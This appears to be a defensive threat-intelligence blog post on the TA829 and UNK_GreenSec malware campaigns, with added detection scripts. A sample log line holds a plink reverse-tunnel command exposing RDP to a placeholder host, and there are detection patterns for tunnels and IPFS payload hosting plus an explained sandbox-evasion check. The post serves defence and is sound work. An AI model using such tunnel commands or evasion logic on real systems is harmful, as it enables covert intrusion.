
TA829 and UNK_GreenSec: Unmasking the Overlapping Tactics Behind Modern Malware Campaigns

If you’re reading this, you’re likely concerned about the relentless evolution of cyber threats—and you’re not alone. In a digital landscape where hacking groups morph tactics and share secrets at breakneck speed, keeping up can feel like chasing shadows. But what if two notorious threat actor groups are not just sharing strategies, but also overlapping their digital footprints and infrastructure? Welcome to the tangled web of TA829 and UNK_GreenSec—a case study in how the lines between cybercrime and espionage are blurring in real time.

In this post, I’ll break down the latest findings from leading cybersecurity researchers on these groups’ shared tactics, give you a plain-English explanation of how they pull off their attacks, and—most importantly—help you understand what this means for your own digital defenses.

Let’s dive in.


Who Are TA829 and UNK_GreenSec? A Quick Primer

Before we unpack their latest moves, let’s put some names to faces (or, at least, to threat group monikers):

Meet TA829

TA829 (also tracked as CIGAR, Nebulous Mantis, Storm-0978, Tropical Scorpius, UAC-0180, UAT-5647, UNC2596, and Void Rabisu) is a Russia-aligned hacking group known for its hybrid playbook. They’re equally comfortable launching espionage operations as they are running financially-motivated ransomware attacks. In short: TA829 is unpredictable and highly adaptive.

Key highlights:

  • Linked to the RomCom RAT (Remote Access Trojan) malware.
  • Known for exploiting zero-day vulnerabilities—previously targeting Mozilla Firefox and Microsoft Windows.
  • Uses both cybercrime and state-sponsored tactics, making attribution notoriously tricky.

Enter UNK_GreenSec

UNK_GreenSec, a relative newcomer in public threat actor tracking, first drew attention when Proofpoint investigators noticed uncanny similarities with TA829’s operations. Their favorite tool? A malware loader called TransferLoader.

Key highlights:

  • Associated with campaigns delivering ransomware (notably Morpheus).
  • Leverages infrastructure and delivery techniques strikingly similar to TA829’s.
  • Suspected of serving as either a peer, a service provider, or perhaps even an alter ego of TA829.

Why does this overlap matter? Because when threat groups start mirroring each other, it raises the stakes for defenders—making attacks harder to spot, trace, and block.


How Did Researchers Connect the Dots? Infrastructure and Tactics as Cyber Fingerprints

Cyber threat intelligence isn’t just about catching hackers red-handed. More often, it’s about pattern recognition—spotting the digital fingerprints hackers leave behind.

Unusual Infrastructure Overlap

Proofpoint’s researchers flagged an “unusual amount of similar infrastructure, delivery tactics, landing pages, and email lure themes” between TA829 and UNK_GreenSec. This isn’t just a coincidence—think of it like two burglars using the same getaway car and lockpicks in different neighborhoods.

Shared Building Blocks:

  • REM Proxy services: Both groups rely on compromised MikroTik routers to obfuscate their traffic routes, relay phishing emails, and hide their real locations.
  • Freemail providers: They use free email accounts (Gmail, ukr.net, etc.) created en masse, likely via an email builder utility.
  • Landing pages: Spoofed Google Drive or Microsoft OneDrive pages, often with elaborate filtering to weed out security sandboxes.

Email Campaigns: The First Domino

Most attacks start with a phishing email—sometimes in the email body, sometimes as a PDF attachment. The goal is simple: Get the unsuspecting user to click a link.

Here’s what happens next:

  1. Redirection via Rebrandly: The link redirects through Rebrandly’s URL-shortening service.
  2. Filtering: Only “real” victims—not security researchers—are allowed through.
  3. Fake cloud pages: The victim lands on a spoofed cloud storage page, primed to deliver the next stage of the attack.
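To make the lure pattern above concrete from the mail-gateway side, here is an added triage script (not code from the original post, and not Proofpoint’s tooling) that scores inbound messages on the traits the campaign combines: a freemail sender, a job or invoice subject, a link that hops through a URL shortener, cloud-storage wording that points somewhere other than the vendor’s own domain, and a PDF attachment. The sample messages are constructed; Gmail, ukr.net, the sender address and the Rebrandly shortener come from the post, while the keyword lists, the vendor-domain list and the scoring weights are assumptions you would tune to your own mail flow.

```python
"""Triage inbound mail for the phishing lure pattern described in the post.

Added example, not code from the original article or from Proofpoint.
Email records below are constructed. Gmail/ukr.net and the Rebrandly
shortener come from the campaign description; keyword lists, vendor
domains and scoring weights are assumptions chosen for illustration.
"""
import re
from dataclasses import dataclass, field

FREEMAIL_DOMAINS = {"gmail.com", "ukr.net"}      # freemail providers named in the post
SHORTENER_DOMAINS = {"rebrand.ly"}                 # Rebrandly's shortener domain
LURE_KEYWORDS = ("job", "resume", "invoice", "offer", "position")   # assumption
CLOUD_WORDS = ("onedrive", "google drive", "sharepoint")            # assumption
# Domains a genuine share link from these vendors would land on (assumption).
VENDOR_SUFFIXES = ("microsoft.com", "live.com", "sharepoint.com", "google.com")

URL_HOST_RE = re.compile(r"https?://([^/\s]+)", re.IGNORECASE)


@dataclass
class Email:
    sender: str
    subject: str
    body: str
    attachments: list = field(default_factory=list)


def score_email(msg: Email):
    """Return (score, reasons); a higher score means a closer match to the lure."""
    score, reasons = 0, []
    sender_domain = msg.sender.rsplit("@", 1)[-1].lower()
    if sender_domain in FREEMAIL_DOMAINS:
        score += 1
        reasons.append(f"freemail sender domain {sender_domain}")

    if any(k in msg.subject.lower() for k in LURE_KEYWORDS):
        score += 1
        reasons.append("lure keyword in subject")

    hosts = {h.lower() for h in URL_HOST_RE.findall(msg.body)}
    if hosts & SHORTENER_DOMAINS:
        score += 2  # the redirect/filter hop is the most distinctive trait
        reasons.append("link routed through a URL shortener")

    mentions_cloud = any(w in msg.body.lower() for w in CLOUD_WORDS)
    if mentions_cloud and hosts and not any(h.endswith(VENDOR_SUFFIXES) for h in hosts):
        score += 1
        reasons.append("cloud-storage wording but link is not on the vendor's domain")

    if any(a.lower().endswith(".pdf") for a in msg.attachments):
        score += 1
        reasons.append("PDF attachment (the link may be inside it)")
    return score, reasons


def triage(messages, threshold=3):
    """Return the messages whose score reaches the threshold, for analyst review."""
    return [m for m in messages if score_email(m)[0] >= threshold]


# Constructed samples: a lure modelled on the post, a routine message, an invoice lure.
SAMPLE = [
    Email("ximajazehox333@gmail.com",          # sender address quoted in the post
          "Job offer: Senior Accountant position",
          "Your contract is shared on OneDrive: https://rebrand.ly/placeholder-link"),
    Email("alice@example.com", "Q3 budget review",
          "Notes are here: https://contoso.sharepoint.com/sites/finance"),
    Email("billing@ukr.net", "Invoice 2211", "See attached.", ["invoice.pdf"]),
]

if __name__ == "__main__":
    for m in SAMPLE:
        print(m.sender, *score_email(m))
```

The shortener hop carries double weight on purpose: a freemail sender or a job-themed subject alone is routine, but a cloud-share message whose only link goes through a redirector is exactly the filtering stage described above, and the reasons list is what an analyst needs to confirm or dismiss the hit.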


Malware in Action: SlipScreen, TransferLoader, and the Modern Threat Arsenal

Once a victim clicks that malicious link, the attack can fork depending on which group is pulling the strings. Let’s break down the two main paths:

TA829’s Chain: SlipScreen and RomCom RAT

  • SlipScreen: A first-stage loader designed to check if the infected computer is “real” (not a sandbox). It does this by counting recent files in the user’s Windows Registry—if there’s a healthy number (at least 55), it proceeds.
  • Payloads: Next, it drops further malware:
      • MeltingClaw (a downloader)
      • ShadyHammock or DustyHammock (backdoors)
      • SingleCamper/SnipBot (an updated RomCom RAT)

Here’s why that matters: Each stage is like peeling an onion. There’s always another layer, and each one is harder to detect.

Fun fact: Previous versions checked for at least 100 recent documents—an arbitrary but clever way to avoid infecting decoy systems.
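The practical consequence of that recent-documents gate is for whoever runs the analysis sandboxes: a freshly built VM with an empty RecentDocs list never reaches the payload stage, so the detonation report looks clean. The added script below (not code from the post and not the loader’s own logic) models the Windows RecentDocs registry key as a mapping of value names to data and reports whether a VM would clear the current 55-entry threshold and the earlier 100-entry one. The thresholds come from the post; exactly which values SlipScreen counts is an assumption, and the sample key contents are constructed so the check runs on any OS, with an optional live read on Windows.

```python
"""Sandbox-readiness check modelled on SlipScreen's recent-documents gate.

Added example; not code from the post and not the loader's own logic.
The RecentDocs key (HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RecentDocs)
holds numbered values ("0", "1", ...) plus an MRUListEx ordering blob; which of
these the loader actually counts is an assumption here. Thresholds 55 (current)
and 100 (earlier builds) are from the post. Sample contents are constructed.
"""
CURRENT_THRESHOLD = 55
LEGACY_THRESHOLD = 100
RECENT_DOCS_PATH = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs"


def count_recent_docs(values):
    """Count numbered entries in a RecentDocs value mapping, ignoring MRUListEx."""
    return sum(1 for name in values if name.isdigit())


def passes_gate(count, threshold=CURRENT_THRESHOLD):
    """True if a loader using this threshold would proceed to its next stage."""
    return count >= threshold


def readiness_report(values):
    """Summarise how an analysis VM fares against both known thresholds."""
    n = count_recent_docs(values)
    return {
        "recent_docs": n,
        "passes_current": passes_gate(n, CURRENT_THRESHOLD),
        "passes_legacy": passes_gate(n, LEGACY_THRESHOLD),
        "shortfall_current": max(0, CURRENT_THRESHOLD - n),
    }


def make_recent_docs(n):
    """Build a constructed RecentDocs mapping with n numbered entries."""
    values = {"MRUListEx": bytes(4 * n + 4)}  # placeholder blob, not a real MRU list
    for i in range(n):
        values[str(i)] = f"document{i}.docx".encode("utf-16-le")
    return values


def read_recent_docs_live():
    """On Windows, read the real key for the current user; elsewhere return None."""
    try:
        import winreg
    except ImportError:
        return None
    values = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RECENT_DOCS_PATH) as key:
        _, value_count, _ = winreg.QueryInfoKey(key)
        for i in range(value_count):
            name, data, _ = winreg.EnumValue(key, i)
            values[name] = data
    return values


if __name__ == "__main__":
    live = read_recent_docs_live()
    print(readiness_report(live if live is not None else make_recent_docs(60)))
```

Run it on each sandbox image; any VM reporting a shortfall needs a more realistic user history (opened documents, not just installed software) before its verdicts on this loader family can be trusted. The legacy threshold is kept in the report because older builds still circulate.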

UNK_GreenSec’s Path: TransferLoader and the Ransomware Angle

UNK_GreenSec’s campaigns have their own twist:

  • Theme: Often disguised as job opportunities, luring victims into downloading what looks like a resume PDF.
  • TransferLoader: The primary malware loader, designed to stay stealthy and serve up more dangerous payloads.
  • Final payloads: Includes Morpheus ransomware, a rebranded version of HellCat.

Why is this scary? TransferLoader leverages dynamic landing pages and server-side filtering, making detection a moving target. Plus, the use of InterPlanetary File System (IPFS) for hosting payloads decentralizes their infrastructure, making takedown efforts even tougher.


The Secret Sauce: Living-Off-the-Land and Stealth Tactics

Both groups exploit “living-off-the-land” (LOTL) tactics—a hacker term for abusing legitimate software and services to move undetected.

What does LOTL look like in these campaigns?

  • Bulletproof hosting: Using providers who turn a blind eye to abuse, making takedown nearly impossible.
  • PLINK (PuTTY Link): A tool for setting up secure SSH tunnels, used here to hide command-and-control (C2) traffic.
  • IPFS hosting: Decentralized file sharing to host utilities and payloads, frustrating traditional security efforts.
  • Encrypted C2 communications: Once inside, all communications are encrypted, keeping prying eyes out.

Let me explain: LOTL tactics are like burglars using your own house keys and alarm codes against you. They blend in so well with normal activity that traditional security tools can easily miss the threat.


Are TA829 and UNK_GreenSec the Same? Four Theories, One Unsettling Trend

Here’s where things get spicy. The evidence points to a close relationship between the groups, but the exact nature remains unclear. Proofpoint outlines four plausible scenarios:

  1. Same Third-Party Provider: Both groups are clients of a common “cybercrime-as-a-service” provider, buying infrastructure and tools off the shelf.
  2. TA829 as Distributor: TA829 runs its own infrastructure and sometimes lets UNK_GreenSec use it.
  3. UNK_GreenSec as Provider: UNK_GreenSec builds the infrastructure, sometimes using it for their own attacks, sometimes renting it out to TA829.
  4. They’re One and the Same: The groups are aliases for a single entity, and TransferLoader is simply a new addition to their malware suite.

As Proofpoint wisely notes: Attribution in today’s threat landscape is a moving target. Espionage and cybercrime are converging, with traditional boundaries melting away.

Here’s why that matters: For defenders, it means you can’t rely on old assumptions. Whether you’re facing a “cybercriminal” or a “nation-state,” the tools, tactics, and infrastructure might be identical.


Decoding the Attack Flow: From Phish to Full Compromise

Let’s walk through a real-world attack sequence, so you can see where the danger lies—and where defenses can break down.

  1. Phishing email lands in inbox
     • Sender address looks legitimate (e.g., ximajazehox333@gmail.com).
     • Subject line promises a job offer, invoice, or other enticing bait.

  2. Victim clicks the embedded link or opens PDF
     • Link is routed through Rebrandly, filtering out non-targets.
     • If the victim passes the filter, they’re redirected to a fake OneDrive or Google Drive page.

  3. Malware loader is dropped
     • Depending on the campaign, this could be SlipScreen or TransferLoader.
     • Loader checks system characteristics to confirm it’s a genuine user.

  4. Final payloads deployed
     • Could be ransomware (Morpheus), a banking trojan, backdoor, or RAT.

  5. Persistence and lateral movement
     • Attackers use encrypted tunnels (via PLINK) and legitimate tools to move around undetected.
     • Additional payloads can be fetched from IPFS or other decentralized services.

  6. Data theft, encryption, or espionage
     • Attack goals vary—sometimes it’s extortion, other times it’s intelligence gathering.

Key takeaway: Each stage is optimized for stealth and flexibility. Attackers dynamically adjust their methods based on what works, and what defenses they encounter.


Why Do These Attacks Work? What Makes Them So Effective?

It’s easy to blame user “carelessness,” but the reality is more nuanced:

  • Sophisticated social engineering: Phishing emails are tailored, timely, and well-crafted.
  • Technical evasion: Using proxies, encrypted traffic, decentralized hosting, and system checks to avoid detection.
  • Modular payloads: Attackers can mix and match malware components to fit the job.

Empathy moment: If you’re a security leader, sysadmin, or just someone who wants to avoid malware, it’s not your fault these attacks are so hard to spot. The adversaries are constantly innovating, and even well-trained users can fall for a convincingly crafted lure.


What Can You Do? Practical Steps for Defenders

Knowledge is power. Here’s how you can tilt the balance in your favor:

1. Harden Your Infrastructure

  • Patch continually: Zero-day exploits are a favorite tactic for these groups. Prioritize patches for software like browsers and routers.
  • Lock down routers: MikroTik routers are a frequent target. Change default credentials, update firmware, and monitor for unauthorized access.
  • Monitor outbound traffic: Unusual traffic patterns, especially via SSH tunnels or to IPFS endpoints, should trigger alerts.
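Two of the living-off-the-land signals described earlier (PLINK tunnels for C2 and payload hosting on IPFS) are also the two things this step asks you to alert on, so here is an added detection script that covers both; it is not code from the post. It runs over constructed, pipe-delimited log records (process-creation events with image path and command line, and proxy requests with a URL) and flags plink.exe launched with PuTTY’s documented port-forwarding (-L, -R, -D), no-shell (-N) or password (-pw) switches, plink running from a user-writable path, and HTTP requests to IPFS gateways or /ipfs/ and /ipns/ content paths. The gateway list, the user-writable path list and the sample records (TEST-NET addresses, placeholder content IDs) are assumptions to adapt to your own telemetry.

```python
"""Flag Plink-built SSH tunnels and payload fetches from IPFS gateways.

Added example, not code from the post. Log records are constructed
(pipe-delimited, one event per line) and use TEST-NET addresses; the gateway
list, user-writable path list and wording are assumptions. The Plink options
checked (-L, -R, -D, -N, -pw) are PuTTY's documented switches.
"""
import re
from urllib.parse import urlparse

TUNNEL_FLAGS = {"-L", "-R", "-D"}                  # local, remote, dynamic forwarding
IPFS_GATEWAYS = {"ipfs.io", "dweb.link", "cloudflare-ipfs.com"}   # starting list, assumption
IPFS_PATH_RE = re.compile(r"^/(ipfs|ipns)/", re.IGNORECASE)
IPFS_SUBDOMAIN_RE = re.compile(r"\.(ipfs|ipns)\.", re.IGNORECASE)
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\users\\public\\")


def analyze_process(image, cmdline):
    """Reasons to alert on a process-creation event involving plink.exe."""
    reasons = []
    if image.rsplit("\\", 1)[-1].lower() != "plink.exe":
        return reasons
    tokens = cmdline.split()
    if any(t in TUNNEL_FLAGS for t in tokens):
        reasons.append("plink started with a port-forwarding option (SSH tunnel)")
    if "-N" in tokens:
        reasons.append("plink -N: tunnel only, no remote shell requested")
    if "-pw" in tokens:
        reasons.append("password supplied on the command line")
    if any(p in image.lower() for p in USER_WRITABLE):
        reasons.append("plink running from a user-writable directory")
    return reasons


def analyze_url(url):
    """Reasons to alert on an outbound HTTP(S) request."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    reasons = []
    if host in IPFS_GATEWAYS or host.endswith(tuple("." + g for g in IPFS_GATEWAYS)):
        reasons.append(f"request to known IPFS gateway {host}")
    if IPFS_PATH_RE.match(parsed.path) or IPFS_SUBDOMAIN_RE.search(host):
        reasons.append("IPFS content path or subdomain in URL")
    return reasons


def scan(lines):
    """Run both analyzers over 'kind|host|...' records; return (host, reason) pairs."""
    findings = []
    for line in lines:
        kind, host, *rest = line.rstrip("\n").split("|")
        if kind == "proc" and len(rest) == 2:
            reasons = analyze_process(rest[0], rest[1])
        elif kind == "proxy" and len(rest) == 1:
            reasons = analyze_url(rest[0])
        else:
            continue
        findings.extend((host, r) for r in reasons)
    return findings


# Constructed records: one tunnel from a user temp dir, one admin's routine
# plink use, one IPFS gateway download, one ordinary download.
SAMPLE_LOG = [
    r"proc|WS01|C:\Users\jdoe\AppData\Local\Temp\plink.exe|plink.exe -ssh -N -R 8443:127.0.0.1:3389 svc@203.0.113.10 -pw hunter2",
    r"proc|ADM02|C:\Program Files\PuTTY\plink.exe|plink.exe -ssh -batch admin@10.0.0.5 uptime",
    r"proxy|WS01|https://ipfs.io/ipfs/bafyPLACEHOLDERcid/setup.exe",
    r"proxy|WS07|https://www.example.com/downloads/report.pdf",
]

if __name__ == "__main__":
    for host, reason in scan(SAMPLE_LOG):
        print(f"{host}: {reason}")
```

The administrator’s routine plink call produces no finding, which is the point: plink itself is legitimate, so the rule keys on the tunnel and no-shell switches and on where the binary runs from, not on the file name alone. The IPFS check looks at both path-style and subdomain-style gateway URLs, since public gateways serve content either way.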

2. Train and Test Your People

  • Phishing simulations: Regular, realistic testing keeps your team sharp.
  • Awareness programs: Educate users about the latest lures—job offers, cloud sharing links, etc.

3. Deploy and Tune Security Tools

  • Network segmentation: Limit the blast radius if an endpoint is compromised.
  • Endpoint detection and response (EDR): Invest in solutions that look for behavioral indicators, not just known signatures.
  • Threat intelligence: Subscribe to feeds from trusted providers like Proofpoint and PRODAFT.

4. Plan for the Worst

  • Incident response: Have a clear, tested plan for dealing with ransomware or data breaches.
  • Backups: Maintain regular, offline backups to recover quickly from file encryption attacks.

The Big Picture: Why Attribution Means Less Than Ever

As the boundaries between cybercrime and espionage dissolve, defenders must focus less on “who” and more on “how”—and “how to stop it.”

This case study is a perfect example. TA829 and UNK_GreenSec may be distinct or two faces of the same adversary. What matters most is recognizing the overlapping infrastructure, tactics, and tradecraft, so you can spot and block their campaigns—no matter who’s behind the keyboard.


FAQ: People Also Ask

What is the RomCom RAT, and why is it dangerous?

The RomCom RAT (Remote Access Trojan) is a type of malware that allows attackers to take full control of an infected system remotely. It’s dangerous because it can steal sensitive data, install additional malware, and evade detection using stealthy techniques.

How do TA829 and UNK_GreenSec deliver their malware?

Both groups primarily use phishing emails with malicious links or attachments. These links often lead to fake cloud storage pages, which then deliver malware loaders like SlipScreen or TransferLoader.

What is TransferLoader?

TransferLoader is a malware loader first documented in 2025. Its main goal is to install further malware (like ransomware) onto a victim’s machine while remaining undetected by traditional security tools.

How do REM Proxy services work in these campaigns?

REM Proxy services are networks of compromised routers (often MikroTik devices) that attackers use to relay their malicious traffic, disguise its true origin, and avoid being blocked or traced.

Can regular antivirus stop these threats?

Traditional antivirus solutions may miss these threats because the attackers use customized, modular malware and encrypted communications. Advanced threat detection, behavioral monitoring, and user education are essential.

What should organizations do to defend against these attacks?

  • Patch systems and devices promptly.
  • Monitor for suspicious outbound traffic.
  • Educate users about phishing tactics.
  • Use advanced security tools (EDR, threat intelligence).
  • Plan for incident response and maintain secure backups.

For even more details on these threat groups, check out The Hacker News coverage and Zscaler’s ThreatLabz analysis.


Final Thoughts: Stay Vigilant as Threats Converge

As TA829 and UNK_GreenSec demonstrate, today’s adversaries are operating in increasingly sophisticated—and interconnected—ways. Whether they’re two sides of the same coin or simply borrowing from the same playbook, the result is the same: Advanced, persistent, and hard-to-detect attacks.

Stay informed, keep your defenses layered, and never underestimate the creativity of cyber adversaries. If you found this article helpful, consider subscribing for more threat intelligence updates and practical security insights.

Until next time—stay safe, stay curious, and keep one step ahead.

